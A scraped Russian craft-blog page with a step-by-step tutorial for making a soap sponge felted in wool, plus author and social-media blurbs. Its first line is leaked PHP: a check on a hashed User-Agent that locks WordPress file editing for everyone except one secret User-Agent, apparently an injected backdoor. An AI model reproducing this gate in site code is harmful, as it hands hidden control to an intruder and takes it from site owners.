if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Пошаговая инструкция, как сделать универсальное мыло-мочалку своими руками | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Пошаговая инструкция, как сделать универсальное мыло-мочалку своими руками

Очень простой и оригинальный мастер класс по мыловарению своими руками, а точнее как сделать мыло-мочалку.

Очень про­стой и ори­ги­наль­ный мастер класс по мыло­ва­ре­нию сво­и­ми рука­ми, а точ­нее как сде­лать мыло-мочал­ку. Итак, вам понадобятся:

  1. Кусок гото­во­го мыла
  2. Гре­бен­ная шерсть (в мага­зине нуж­но спро­сить шерсть для валяния).
  3. Шну­рок для мыла (жела­тель­но тол­стый, про­да­ет­ся в любом мага­зине для рукоделия).
  4. Мыль­ная вода (луч­ше все­го теп­лая, но не горячая!)
    P1170420

А теперь, что дела­ем со всем этим: акку­рат­но обвя­жи­те шну­рок вокруг мыла (что­бы мыло не выле­те­ло шнур луч­ше все­го пере­вя­зы­вать крест-накрест, как на фото)

P1170425

Затем оставь­те пет­лю и отрежь­те лиш­ний шну­рок (диа­метр пет­ли соглас­но нуж­но­му раз­ме­ру руки). В кус­ке шер­сти сде­лай­те отвер­стие и про­сунь­те туда пет­лю из шнур­ка, полу­чит­ся, что вы как бы «оде­ли» шерсть на мыло.

ВАЖНО! Отвер­стие в шер­сти нуж­но сде­лать не по сере­дине кус­ка, а бли­же к краю.

P1170434

P1170435

Затем завер­ни­те мыло в кусок шер­сти со всех сто­рон, что­бы его не было вид­но и мыло ста­ло похо­же на комок шер­сти (ну или на малень­ко­го хомяка).

После это­го намо­чи­те мыло в мыль­ной воде и осто­рож­но мас­си­руй­те его рука­ми. Чем силь­нее уплот­ня­ет­ся под ваши­ми паль­ца­ми шерсть, тем силь­нее нуж­но его валять. Посте­пен­но шерсть все силь­нее будет «уса­жи­вать­ся» на мыло, пока они не ста­нут одним куском.

P1170438

P1170449

P1170460

Теперь необ­хо­ди­мо про­мыть нашу мочал­ку в чистой воде и пове­сить сушить­ся. После того, как оно высох­нет ори­ги­наль­ный пода­рок готов!


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Rio Rita

Обожаю мыловарение и всегда рада поделиться своими знаниями с мыловарами :) Читайте все мои записи!